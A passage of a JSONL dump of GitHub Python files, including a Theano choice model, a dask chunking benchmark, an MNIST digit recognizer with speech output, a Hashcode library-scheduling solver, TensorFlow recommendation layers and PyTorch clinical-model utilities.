T.argmax(self.p_y_given_x, axis=-1)\n\n\t\t# keep track of input\n\t\tself.x_ng = input[0]\n\t\tself.x_g = input[1]\n\t\tself.av = av\n\t\tself.y = output\n\n\tdef loglikelihood(self, y):\n\t\t# loglikelihood sum\n\t\treturn T.sum(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])\n\n\tdef cross_entropy(self, z):\n\t\t# cross entropy loss cross_entropy(z,p):\n\t\t# sum(z*log(p) + (1-z)*log(1-p), axis=-1)\n\t\treturn T.sum(\n\t\t\tz * T.log(self.p_z_given_x_h)\n\t\t\t+ (1 - z) * T.log(1 - self.p_z_given_x_h))\n\n\tdef errors(self, y):\n\t\t# returns the number of errors as a percentage of total number of examples\n\t\treturn T.mean(T.neq(self.y_pred, y))\n","repo_name":"LiTrans/ICLV-RBM","sub_path":"models/rum.py","file_name":"rum.py","file_ext":"py","file_size_in_byte":9915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71744460667","text":"import numpy as np\n\n#taking row and coloumn input from user\nrow = int(input(\"Enter No. Of Rows\"))\ncols = int(input(\"Enter No. 
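# --- Editor's check (NumPy, toy values) of the hand-rolled indicator loss in
# the ICLV class above: cross_entropy(z, p) = sum(z*log(p) + (1-z)*log(1-p)),
# with p clipped away from 0/1 exactly as the layer does.
import numpy as np

z = np.array([[1.0, 0.0], [0.0, 1.0]])                       # binary indicators
p = np.clip(np.array([[0.9, 0.2], [0.3, 0.8]]), 1e-8, 1 - 1e-8)
ce = np.sum(z * np.log(p) + (1 - z) * np.log(1 - p))
print(ce)  # log(0.9) + log(0.8) + log(0.7) + log(0.8), approx -0.9083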
Of Coloumns\"))\n\n#setting range for \"FOR\"\nf = max(row,cols)\nfor i in range(1,f+1):\n#Printing zero matrices for the results thus obtained\n if row%i==0 and cols%i==0:\n print(np.zeros((i,i)))\n","repo_name":"Anirudhsh/MLassignments","sub_path":"checkrc.py","file_name":"checkrc.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36849555673","text":"import os\nimport sys\n\nsys.path.append(\"../\")\nimport os\n\nos.chdir(\"/home/ghiggi/Projects/deepsphere-weather\")\nimport time\nimport xarray as xr\n\n# from multiprocessing import Pool\nfrom functools import partial\nfrom dask.distributed import Client, LocalCluster\n\n\nfrom modules.xscaler import GlobalStandardScaler\nfrom modules.xscaler import GlobalMinMaxScaler\nfrom modules.xscaler import AnomalyScaler\nfrom modules.xscaler import Climatology\n\nbase_data_dir = \"/ltenas3/DeepSphere/data/preprocessed/ERA5_HRES/\"\nsampling_name = \"O24\"\ndata_dir = os.path.join(base_data_dir, sampling_name)\nprint(\"Data directory:\", data_dir)\n##------------------------------------------------------------------------.\n### Load data\n# - Define path for dynamic data (i.e. pressure and surface levels variables)\ndynamic_fpath = os.path.join(\n data_dir, \"Data\", \"dynamic\", \"space_chunked\", \"dynamic.zarr\"\n)\n# dynamic_fpath = os.path.join(data_dir, \"Data\",\"dynamic\", \"time_chunked\", \"dynamic.zarr\")\n# - Define path for boundary conditions data (i.e. TOA)\nbc_fpath = os.path.join(data_dir, \"Data\", \"bc\", \"space_chunked\", \"bc.zarr\")\n# bc_fpath = os.path.join(data_dir, \"Data\",\"bc\", \"time_chunked\", \"bc.zarr\")\n\n##------------------------------------------------------------------------------.\n### Benchmark reaading data\n# --> Dask rechunking helps a lot for performance !!!\n\n# - Define dask chunks\nnode_dask_chunks = 200\nn_feature = 2\nn_node = node_dask_chunks * 30\n\ndask_chunks = {\n \"feature\": 1, # each single feature\n \"time\": -1, # all across time\n \"node\": node_dask_chunks, # 2.73 MB per disk chunk --> 1092 MB each chunk\n}\n# - Without dask rechunking\nda_dynamic = xr.open_zarr(dynamic_fpath)[\"data\"]\nda_dynamic = da_dynamic.isel(node=slice(0, n_node)).isel(feature=slice(0, 5))\nda_orig = da_dynamic\nt_i = time.time()\nb = da_orig.compute()\nprint(\"- Oring Elapsed time: {:.2f}s\".format((time.time() - t_i)))\ndel da_dynamic\ndel b\n\n# - With dask rechunking\nda_dynamic = xr.open_zarr(dynamic_fpath)[\"data\"]\nda_dynamic = da_dynamic.isel(node=slice(0, n_node)).isel(feature=slice(0, n_feature))\nda_rechunked = da_dynamic.chunk(dask_chunks)\nt_i = time.time()\na = da_rechunked.compute()\nprint(\"- Rechunked Elapsed time: {:.2f}s\".format((time.time() - t_i)))\ndel da_dynamic\ndel a\n\nda_rechunked\nda_orig\n\n##------------------------------------------------------------------------------.\n# Benchmark to_dataset() use\nnode_dask_chunks = 200\nn_feature = 8\nn_node = node_dask_chunks * 30\n\ndask_chunks = {\n \"feature\": 1, # each single feature\n \"time\": -1, # all across time\n \"node\": node_dask_chunks, # 2.73 MB per disk chunk --> 1092 MB each chunk\n}\n\nda_dynamic = xr.open_zarr(dynamic_fpath)[\"data\"]\n# da_dynamic = da_dynamic.isel(node=slice(0,n_node)).isel(feature=slice(0,n_feature))\nda_rechunked = da_dynamic.chunk(dask_chunks)\nt_i = time.time()\nb = da_rechunked.max(\"feature\").compute() # 380 s , 155s\nprint(\"- DataArray Elapsed time: {:.2f}s\".format((time.time() - t_i)))\ndel 
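# --- Editor's sketch: the i values printed by the loop above are exactly the
# common divisors of rows and cols, i.e. the divisors of gcd(rows, cols), so
# the scan only needs to run up to the gcd rather than max(rows, cols).
import math
import numpy as np

def common_divisor_matrices(rows, cols):
    g = math.gcd(rows, cols)
    return [np.zeros((i, i)) for i in range(1, g + 1) if g % i == 0]

for m in common_divisor_matrices(6, 4):
    print(m)  # 1x1 and 2x2 zero matrices, since gcd(6, 4) == 2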
da_dynamic\ndel da_rechunked\ndel b\n\nda_dynamic = xr.open_zarr(dynamic_fpath)[\"data\"]\n# da_dynamic = da_dynamic.isel(node=slice(0,n_node)).isel(feature=slice(0,n_feature))\nda_rechunked = da_dynamic.chunk(dask_chunks)\nds_rechunked = da_rechunked.to_dataset(\"feature\")\nt_i = time.time()\na = ds_rechunked.max().compute() # 77 s, 83 s\nprint(\"- Dataset Elapsed time: {:.2f}s\".format((time.time() - t_i)))\ndel da_dynamic\ndel da_rechunked\ndel a\n\n##------------------------------------------------------------------------------.\n## Graph viz\nda_dynamic = xr.open_zarr(dynamic_fpath)[\"data\"]\nda_dynamic = da_dynamic.isel(node=slice(0, 10)).isel(feature=slice(0, 5))\nda_dynamic = da_dynamic.compute()\ndask_chunks = {\n \"feature\": 1, # each single feature\n \"time\": -1, # all across time\n \"node\": 2, # 2.73 MB per disk chunk --> 1092 MB each chunk\n}\nda_rechunked = da_dynamic.chunk(dask_chunks)\n\n\nda_rechunked.data.visualize()\nds = da_rechunked.to_dataset(\"feature\")\nds.mean().data.visualize()\n","repo_name":"deepsphere/deepsphere-weather","sub_path":"dev/dev_scalers.py","file_name":"dev_scalers.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"6"} +{"seq_id":"12706864809","text":"from tensorflow import keras\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport cv2\r\nfrom gtts import gTTS\r\nimport os\r\n\r\n# Load your trained model for handwritten digit recognition\r\nmodel = keras.models.load_model('mnist_1.h5') #trained mnist dataset using cnn reacher#1\r\n\r\n\r\ndef recognize_digit_from_image(image_path):\r\n # Load and preprocess the image\r\n img = Image.open(image_path).convert('L') # Convert to grayscale\r\n img = img.resize((28, 28)) #img = img.resize((28, 28))\r\n img_array = np.array(img)\r\n img_array = img_array / 255.0 # Normalize the pixel values\r\n img_array = img_array.reshape(1, 28, 28)\r\n\r\n # Make a prediction using the model\r\n prediction = model.predict(img_array)\r\n predicted_digit = np.argmax(prediction)\r\n\r\n # Convert the predicted digit to speech\r\n text_to_speech = f\"The predicted digit is {predicted_digit}\"\r\n tts = gTTS(text_to_speech)\r\n\r\n # Save the speech output as an audio file\r\n tts.save(\"predicted_digit_output.mp3\")\r\n\r\n # Display the image with the recognized digit\r\n img_with_text = np.array(img.convert('RGB'))\r\n cv2.putText(img_with_text, f'Predicted Digit: {predicted_digit}', (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1,\r\n (0, 255, 0), 2)\r\n cv2.imshow('Handwritten Digit Recognition', img_with_text)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\n # Play the audio file\r\n os.system(\" predicted_digit_output.mp3\") # to save the output as audio file\r\n\r\n\r\n# Usage\r\nimage_path = 'sample_5.png'\r\nrecognize_digit_from_image(image_path)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n'''import tensorflow as tf\r\nimport cv2\r\nimport numpy as np\r\nimport pyttsx3\r\nimport matplotlib.pyplot as plt\r\n\r\n# Load the pre-trained model\r\nmodel = 
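# --- Editor's sketch of the pattern benchmarked above, on synthetic data:
# with one dask chunk per feature, to_dataset(dim='feature') gives every
# feature its own variable (and its own task graph), which is consistent with
# the roughly 2-5x faster Dataset reduction in the timings logged above.
# Assumes dask is installed; array sizes here are toy values.
import numpy as np
import xarray as xr

da = xr.DataArray(
    np.random.rand(8, 100, 400),
    dims=("feature", "time", "node"),
    coords={"feature": [f"f{i}" for i in range(8)]},
).chunk({"feature": 1, "time": -1, "node": 200})

ds = da.to_dataset(dim="feature")  # one lazily-evaluated variable per feature
print(ds.max().compute())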
tf.keras.models.load_model('mnist_2.h5')\r\n\r\nimage = cv2.imread('img_data_mini.jpg')\r\ngrey = cv2.cvtColor(image.copy(), cv2.COLOR_BGR2GRAY)\r\nret, thresh = cv2.threshold(grey.copy(), 75, 255, cv2.THRESH_BINARY_INV)\r\ncontours, _ = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\npreprocessed_digits = []\r\nfor c in contours:\r\n x, y, w, h = cv2.boundingRect(c)\r\n\r\n # Creating a rectangle around the digit in the original image (for displaying the digits fetched via contours)\r\n cv2.rectangle(image, (x, y), (x + w, y + h), color=(0, 255, 0), thickness=2)\r\n\r\n # Cropping out the digit from the image corresponding to the current contours in the for loop\r\n digit = thresh[y:y + h, x:x + w]\r\n\r\n # Resizing that digit to (18, 18)\r\n resized_digit = cv2.resize(digit, (18, 18))\r\n\r\n # Padding the digit with 5 pixels of black color (zeros) in each side to finally produce the image of (28, 28)\r\n padded_digit = np.pad(resized_digit, ((5, 5), (5, 5)), 'constant', constant_values=0)\r\n\r\n # Adding the preprocessed digit to the list of preprocessed digits\r\n preprocessed_digits.append(padded_digit)\r\nprint(\"\\n\\n\\n----------------Contoured Image--------------------\")\r\nplt.imshow(image, cmap=\"gray\")\r\nplt.show()\r\n\r\ninp = np.array(preprocessed_digits)\r\n\r\n##\r\n\r\nfor digit in preprocessed_digits:\r\n prediction = model.predict(digit.reshape(1, 28, 28, 1))\r\n\r\n print(\"\\n\\n---------------------------------------\\n\\n\")\r\n print(\"=========PREDICTION============ \\n\\n\")\r\n plt.imshow(digit.reshape(28, 28), cmap=\"gray\")\r\n plt.show()\r\n digit=(print(\"\\n\\nFinal Output: {}\".format(np.argmax(prediction))))\r\n\r\n\r\n # Generate voice output\r\nengine = pyttsx3.init()\r\nengine.say(f\"The recognized digit is {digit}\")\r\nengine.runAndWait()\r\n\r\n# Load an image\r\n#image_path = 'img_data_mini.jpg'\r\n#image = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)\r\n\r\n# Resize the image to (28, 28)\r\n#image = cv2.resize(image, (28, 28))\r\n\r\n# Expand dimensions to (28, 28, 1)\r\n#image = np.expand_dims(image, axis=-1)\r\n\r\n# Normalize pixel values to be between 0 and 1\r\n#image = image / 255.0\r\n\r\n# Make a prediction\r\n#predictions = model.predict(np.expand_dims(image, axis=0))\r\n#digit = np.argmax(predictions[0])'''\r\n","repo_name":"Krishna2912/DIGIT_RECOG","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72486312507","text":"from os import listdir\nfrom os.path import isfile, join\n\nfrom objects import *\nfrom simulate import *\n\ndays_left = -1\n\ndef parse(handle):\n lines = handle.readlines()\n \n header = lines[0].split(\" \")\n total_books = int(header[0])\n total_libraries = int(header[1])\n total_days = int(header[2])\n\n books = lines[1].split(\" \")\n books = [int(s) for s in books]\n books = [Book(i, score) for (i, score) in enumerate(books)]\n\n if total_books != len(books):\n print(\"WARN: total_books(\" + str(total_books) + \") does not match len(books)(\" + str(len(books)) + \")\")\n\n libraries = []\n library_index = 0\n for i in range(2, len(lines) - 1, 2):\n metadata = lines[i].split(\" \")\n num_books = int(metadata[0])\n signup_time = int(metadata[1])\n max_per_day = int(metadata[2])\n \n library_books = [int(i) for i in lines[i+1].split(\" \")]\n library_books = [books[i] for i in library_books]\n library = Library(library_index, library_books, 
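# --- Editor's note on the digit-recognition script above: MNIST training
# images are white digits on a black background, so a photographed digit
# (dark ink on light paper) usually needs inverting before model.predict.
# Minimal sketch; the 28x28 input shape matches the script, while the
# brightness-based auto-invert heuristic is an assumption.
import numpy as np
from PIL import Image

def preprocess_for_mnist(image_path):
    img = Image.open(image_path).convert('L').resize((28, 28))
    arr = np.array(img, dtype=np.float32) / 255.0
    if arr.mean() > 0.5:      # mostly light pixels -> invert to MNIST polarity
        arr = 1.0 - arr
    return arr.reshape(1, 28, 28)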
signup_time, max_per_day)\n \n library_index += 1\n libraries.append(library)\n\n if total_libraries != len(libraries):\n print(\"WARN: total_libraries(\" + str(total_libraries) + \") does not match len(libraries)(\" + str(len(libraries)) + \")\")\n\n #print(\"Loaded \" + str(len(books)) + \" books\")\n #print(\"Loaded \" + str(len(libraries)) + \" libraries\")\n print(\"Scenario will last \" + str(total_days) + \" days\")\n\n return Scenario(libraries, books, total_days)\n\ndef solve(scenario):\n global days_left, library_submissions\n\n \n # Setup Globals\n days_left = scenario.days\n library_submissions = {}\n \n # Preprocess (prune common books & give initial rating)\n\n print(\"Preprocessing...\")\n\n library_scores, _ = preprocess(scenario)\n \n print(\"Finished preprocessing!\")\n\n print(\"Solving...\")\n\n # Sort books\n sorted(scenario.books, key=lambda b: b.score)\n for library in scenario.libraries:\n sorted(library.books, key=lambda b: b.score)\n\n signup_left = -1 # -1 means not signing up, 0 means just finished\n signup_library = None\n\n active_libraries = []\n \n while days_left > 0:\n print(\"Current day: \" + str(days_left))\n if signup_left > 0:\n signup_left -=1\n continue\n elif signup_left == 0:\n # Just finished\n active_libraries.append(signup_library)\n signup_left = -1\n \n library_candidates = list(filter(lambda l: l not in active_libraries, scenario.libraries))\n if len(library_candidates) != 0:\n signup_library = evaluate_for_signup(library_candidates)\n signup_left = signup_library.signup_time\n \n send_books(scenario.libraries)\n\n # Once this has evaluates, a day has passed\n days_left -= 1\n signup_left -= 1\n \n print(\"Solved!\")\n \n # Done solving, output\n generate_output_file(active_libraries)\n \n print(\"Done!\")\n \ndef preprocess(scenario):\n # Steps:\n # 1. Rate each library based on the value of its books\n library_scores = {}\n for library in scenario.libraries:\n score = score_library(library)\n library_scores[library.id] = score\n # 2. 'prune' books from libraries if the book already exists in a higher score library\n best_library_for_book = {}\n i = 0\n for book in scenario.books:\n i += 1\n if i % 500 == 0:\n print(\"Book: \" + str(book.id))\n # Get highest scoring library that contains this book\n best_score = -1\n best_library = None\n for candidate_library in scenario.libraries:\n candidate_score = library_scores[library.id]\n if book in candidate_library.books and best_score < candidate_score:\n best_score = candidate_score\n best_library = candidate_library\n if best_library == None:\n print(\"WARN: Could not find best library for book \" + str(book.id))\n best_library_for_book[book.id] = best_library\n for library in scenario.libraries:\n library.books = list(filter(lambda book: library == best_library_for_book[book.id], library.books))\n # 3. 
Re-rate each library based on new pruned book contents\n for library in scenario.libraries:\n score = score_library(library)\n library_scores[library.id] = score\n \n print(\"Done preprocessing\")\n\n return library_scores, best_library_for_book\n\ndef evaluate_for_signup(libraries):\n highest_scoring_library = None\n highest_score = -1\n\n for library in libraries:\n score = score_library(library)\n if(score > highest_score):\n highest_score = score\n highest_scoring_library = library\n\n return highest_scoring_library\n\ndef score_library(library): \n global days_left \n shipping_days = days_left - library.signup_time\n \n score = 0\n books_shipped = 0\n days_passed = 0\n \n for book in library.books:\n if days_passed == shipping_days:\n break\n\n books_shipped += 1\n if books_shipped == library.books_per_day:\n days_passed += 1\n \n score += book.score\n \n return score\n\n# Takes list of active libaries and updates daily submissions\ndef send_books(libraries):\n global library_submissions\n print(\"Sending books for libraries...\")\n for library in libraries:\n print(\"Sending books for library: \" + str(library.id))\n #if len(library.books < library.books_per_day):\n # submissions[library.id].extend(library.books)\n # library.books = []\n #else:\n submissions = library_submissions[library.id] if library.id in library_submissions else []\n submissions.extend(library.books[:library.books_per_day])\n print(\"Sent \" + str(len(submissions)) + \" books.\")\n library_submissions[library.id] = submissions\n del library.books[:library.books_per_day]\n print(\"Done sending books.\")\n return\n\n#takes in a list of signed up library objects\ndef generate_output_file(libraries_signed_up):\n global library_submissions\n filename = \"output.txt\"\n print(\"Writing output to '\" + filename + \"'...\")\n with open(filename, \"w\") as handle:\n handle.write(str(len(libraries_signed_up)) + \" \\n\")\n for library in libraries_signed_up:\n handle.write(str(library.id) + \" \" + str(len(library_submissions[library.id])) + \"\\n\")\n handle.write(\" \".join(str(book.id) for book in library_submissions[library.id]) + \"\\n\")\n handle.close()\n print(\"Done writing to file.\")\n\ndef get_file(letter):\n path = \"datasets\"\n names = [f for f in listdir(path) if isfile(join(path, f))]\n for name in names:\n if name.startswith(letter + \"_\"):\n return \"datasets/\" + name\n\nINPUT_FILE = get_file(\"b\")\nWHOSE_WAY = \"RAKA\"\n\nwith open(INPUT_FILE, \"r\") as handle:\n print(\"Parsing file '\" + INPUT_FILE + \"'...\")\n scenario = parse(handle)\n print(\"Done parsing.\")\n print(\"total_books = \" + str(len(scenario.books)))\n print(\"total_libraries = \" + str(len(scenario.libraries)))\n\n if WHOSE_WAY == \"RAKA\":\n preprocess(scenario)\n import gannsolve\n random_nn = gannsolve.NeuralNetwork([4,8,10,4,1])\n gannsolve.gen_output_file(random_nn, scenario)\n else:\n solve(scenario)","repo_name":"curz46/hashcode","sub_path":"solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":7434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12992276540","text":"import tensorflow as tf\nfrom tensorflow.python.keras.models import Model\nfrom tensorflow.python.keras.layers import Input, Dense, Layer\nfrom tensorflow.python.keras import backend as K\nfrom tensorflow.python.keras.initializers import truncated_normal, random_normal, glorot_normal, zeros\n\n\nclass SampledSoftmaxLayer(Layer):\n def __init__(self, target_song_size, target_emb_size, 
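# --- Editor's sketch of the capacity math behind score_library above: after
# signing up, a library can ship at most (days_left - signup_time) *
# books_per_day books, so the intended score is the sum of that many of its
# best book scores. Restated here in closed form with toy numbers.
def library_score(book_scores, days_left, signup_time, books_per_day):
    shipping_days = max(0, days_left - signup_time)
    capacity = shipping_days * books_per_day
    return sum(sorted(book_scores, reverse=True)[:capacity])

print(library_score([6, 5, 2, 1], days_left=3, signup_time=1, books_per_day=1))  # 6 + 5 = 11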
num_sampled=2, **kwargs):\n self.num_sampled = num_sampled\n self.target_song_size = target_song_size\n self.target_emb_size = target_emb_size\n super(SampledSoftmaxLayer, self).__init__(**kwargs)\n\n def build(self, input_shape):\n self.song_embedding = self.add_weight(shape=[self.target_song_size, self.target_emb_size],\n initializer=truncated_normal(0, 0.1),\n dtype=tf.float32,\n name=\"song_embedding\")\n self.zero_bias = self.add_weight(shape=[self.target_song_size],\n initializer=zeros,\n dtype=tf.float32,\n trainable=False,\n name=\"bias\")\n super(SampledSoftmaxLayer, self).build(input_shape)\n\n def call(self, inputs_with_label_idx, label_idx=None, training=None, **kwargs):\n \"\"\"\n The first input should be the model as it were, and the second the\n target (i.e., a repeat of the training data) to compute the labels\n argument\n\n \"\"\"\n inputs, label_idx = inputs_with_label_idx\n # the labels input to this function is batch size by 1, where the\n # value at position (i, 1) is the index that is true (not zero)\n # e.g., (0, 0, 1) => (2) or (0, 1, 0, 0) => (1)\n return K.nn.sampled_softmax_loss(weights=self.song_embedding,\n biases=self.zero_bias,\n labels=label_idx,\n inputs=inputs,\n num_sampled=self.num_sampled,\n num_classes=self.target_song_size\n )\n\n def get_config(self, ):\n config = {'target_song_size': self.target_song_size, 'num_sampled': self.num_sampled}\n base_config = super(SampledSoftmaxLayer, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n\nclass DotProductAttentionLayer(Layer):\n def __init__(self, shape, scope=\"attention\", mask=True, has_W=True, pow_p=1, **kwargs):\n self.scope = scope\n self.shape = shape\n self.mask = mask\n self.has_W = has_W\n self.pow_p = pow_p\n super(DotProductAttentionLayer, self).__init__(**kwargs)\n\n def build(self, input_shape):\n # Be sure to call this somewhere!\n self.W = self.add_weight(shape=self.shape,\n initializer=truncated_normal(0, 0.1),\n dtype=tf.float32,\n name=\"W\")\n super(DotProductAttentionLayer, self).build(input_shape)\n\n def call(self, inputs, seq_length=None, max_len=4, get_max=False, out_name=\"out\",\n **kwargs): # key:[B,H,E1], query:[B,E2,1]\n keys, query = inputs\n if self.mask:\n if seq_length is None or max_len is None:\n raise ValueError(\"seq_length and max_len must be provided if use mask\")\n\n if self.has_W:\n weight = tf.transpose(tf.matmul(tf.tensordot(keys, self.W, axes=1), query), [0, 2, 1])\n else:\n weight = tf.transpose(tf.matmul(keys, query), [0, 2, 1])\n\n if self.mask:\n seq_mask = tf.sequence_mask(seq_length, max_len)\n padding = tf.ones_like(seq_mask, dtype=tf.float32) * (-2 ** 16 + 1)\n weight_tmp = tf.where(seq_mask, weight, padding, name=\"weight_tmp\")\n weight = tf.pow(weight_tmp, self.pow_p)\n\n weight = tf.nn.softmax(weight, axis=-1, name=\"weight\") # [B,1,H]\n\n if get_max:\n indices = tf.argmax(weight, -1) # [B,1] ArgMax\n weight = tf.one_hot(indices, max_len) # [B,1,H]\n\n output = tf.reshape(tf.matmul(weight, keys), [-1, keys.get_shape().as_list()[-1]]) # Reshape\n\n return output\n\n def compute_output_shape(self, input_shape):\n # todo\n return None, 8\n\n\nclass CapsuleLayer(Layer):\n def __init__(self, input_units, out_units, max_len, k_max, iteration=3,\n weight_initializer=random_normal(stddev=1.0), **kwargs):\n self.input_units = input_units # E1\n self.out_units = out_units # E2\n self.max_len = max_len\n self.k_max = k_max\n self.iteration = iteration\n self.weight_initializer = weight_initializer\n super(CapsuleLayer, 
self).__init__(**kwargs)\n\n def build(self, input_shape):\n self.B_matrix = self.add_weight(shape=[1, self.k_max, self.max_len], initializer=self.weight_initializer,\n trainable=False, name=\"B\", dtype=tf.float32) # [1,K,H]\n self.S_matrix = self.add_weight(shape=[self.input_units, self.out_units], initializer=self.weight_initializer,\n name=\"S\", dtype=tf.float32)\n super(CapsuleLayer, self).build(input_shape)\n\n def call(self, inputs, **kwargs): # seq_len:[B,1]\n low_capsule, seq_len = inputs\n B = tf.shape(low_capsule)[0]\n seq_len_tile = tf.tile(seq_len, [1, self.k_max]) # [B,K]\n\n for i in range(self.iteration):\n mask = tf.sequence_mask(seq_len_tile, self.max_len) # [B,K,H]\n pad = tf.ones_like(mask, dtype=tf.float32) * (-2 ** 16 + 1) # [B,K,H]\n B_tile = tf.tile(self.B_matrix, [B, 1, 1]) # [B,K,H]\n B_mask = tf.where(mask, B_tile, pad)\n W = tf.nn.softmax(B_mask) # [B,K,H]\n low_capsule_new = tf.tensordot(low_capsule, self.S_matrix, axes=1) # [B,H,E2]\n high_capsule_tmp = tf.matmul(W, low_capsule_new) # [B,K,E2]\n high_capsule = squash(high_capsule_tmp) # [B,K,E2]\n\n # ([B,K,E2], [B,H,E2]->[B,E2,H])->[B,K,H]->[1,K,H]\n B_delta = tf.reduce_sum(\n tf.matmul(high_capsule, tf.transpose(low_capsule_new, perm=[0, 2, 1])),\n axis=0, keep_dims=True\n ) # [1,K,H]\n self.B_matrix.assign_add(B_delta)\n\n return high_capsule\n\n\ndef squash(inputs):\n vec_squared_norm = tf.reduce_sum(tf.square(inputs), axis=-1, keepdims=True)\n scalar_factor = vec_squared_norm / (1 + vec_squared_norm) / tf.sqrt(vec_squared_norm + 1e-9)\n vec_squashed = scalar_factor * inputs # element-wise\n return vec_squashed\n","repo_name":"wangjz1993/MIND","sub_path":"easymatch/layers/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":6850,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"6"} +{"seq_id":"40442857561","text":"import numpy as f\nfrom matplotlib import pyplot as plt\n\nx = f.arange(1,13)\ny = 1 * x + 1\nplt.title(\"student marks\")\nplt.xlabel(\"name\")\nplt.ylabel(\"marks obtained\")\nplt.plot(x,y)\nplt.show()","repo_name":"prajaktak12/python_programs","sub_path":"matlip.py","file_name":"matlip.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35923057688","text":"# Python Modules\r\nimport numpy as np\r\nimport os\r\nimport time\r\nimport math\r\nfrom sklearn.metrics import roc_auc_score, confusion_matrix, average_precision_score, classification_report\r\n\r\n# Torch Modules\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom torchsummary import summary\r\nfrom torch.utils.tensorboard import SummaryWriter\r\nfrom torch.utils.data import Dataset, DataLoader\r\n\r\n# Self Modules\r\nfrom lib.utils.general import prepare_input\r\nfrom lib.utils.logger import log\r\nfrom lib.utils.evaluation_metrics import roc_auc_plot # (y_true, y_pred)\r\nfrom lib.Models.clinical_ft_model import clinical_model\r\nfrom lib.Loading.clinical_data_loader import clinical_data\r\nfrom lib.Loading.feedtube_pretrain_clinic import FEEDTUBE\r\n\r\n\r\ndef to_categorical(y, num_classes=None, dtype='float32'):\r\n \"\"\"Converts a class vector (integers) to binary class matrix.\r\n E.g. for use with categorical_crossentropy.\r\n Args:\r\n y: class vector to be converted into a matrix\r\n (integers from 0 to num_classes).\r\n num_classes: total number of classes. 
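# --- Editor's sketch of the objective SampledSoftmaxLayer above wraps:
# tf.nn.sampled_softmax_loss scores each true item against a handful of
# sampled negatives instead of normalising over the full item vocabulary.
# Vocabulary size, embedding size, and batch size are toy assumptions.
import tensorflow as tf

num_items, emb_size, batch = 1000, 8, 4
item_emb = tf.Variable(tf.random.truncated_normal([num_items, emb_size], stddev=0.1))
zero_bias = tf.zeros([num_items])
user_vec = tf.random.normal([batch, emb_size])               # model output
labels = tf.constant([[3], [17], [256], [999]], tf.int64)    # true item ids

loss = tf.nn.sampled_softmax_loss(
    weights=item_emb, biases=zero_bias, labels=labels,
    inputs=user_vec, num_sampled=20, num_classes=num_items)
print(tf.reduce_mean(loss))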
If `None`, this would be inferred\r\n as the (largest number in `y`) + 1.\r\n dtype: The data type expected by the input. Default: `'float32'`.\r\n Returns:\r\n A binary matrix representation of the input. The classes axis is placed\r\n last.\r\n Example:\r\n >>> a = tf.keras.utils.to_categorical([0, 1, 2, 3], num_classes=4)\r\n >>> a = tf.constant(a, shape=[4, 4])\r\n >>> print(a)\r\n tf.Tensor(\r\n [[1. 0. 0. 0.]\r\n [0. 1. 0. 0.]\r\n [0. 0. 1. 0.]\r\n [0. 0. 0. 1.]], shape=(4, 4), dtype=float32)\r\n >>> b = tf.constant([.9, .04, .03, .03,\r\n ... .3, .45, .15, .13,\r\n ... .04, .01, .94, .05,\r\n ... .12, .21, .5, .17],\r\n ... shape=[4, 4])\r\n >>> loss = tf.keras.backend.categorical_crossentropy(a, b)\r\n >>> print(np.around(loss, 5))\r\n [0.10536 0.82807 0.1011 1.77196]\r\n >>> loss = tf.keras.backend.categorical_crossentropy(a, a)\r\n >>> print(np.around(loss, 5))\r\n [0. 0. 0. 0.]\r\n Raises:\r\n Value Error: If input contains string value\r\n \"\"\"\r\n y = np.array(y, dtype='int')\r\n input_shape = y.shape\r\n if input_shape and input_shape[-1] == 1 and len(input_shape) > 1:\r\n input_shape = tuple(input_shape[:-1])\r\n y = y.ravel()\r\n if not num_classes:\r\n num_classes = np.max(y) + 1\r\n n = y.shape[0]\r\n categorical = np.zeros((n, num_classes), dtype=dtype)\r\n categorical[np.arange(n), y] = 1\r\n output_shape = input_shape + (num_classes,)\r\n categorical = np.reshape(categorical, output_shape)\r\n return categorical\r\n\r\n\r\ndef calculate_accuracy(outputs, targets):\r\n with torch.no_grad():\r\n batch_size = targets.size(0)\r\n\r\n _, pred = outputs.topk(1, 1, largest=True, sorted=True)\r\n pred = pred.t()\r\n correct = pred.eq(targets.view(1, -1))\r\n n_correct_elems = correct.float().sum().item()\r\n\r\n return n_correct_elems / 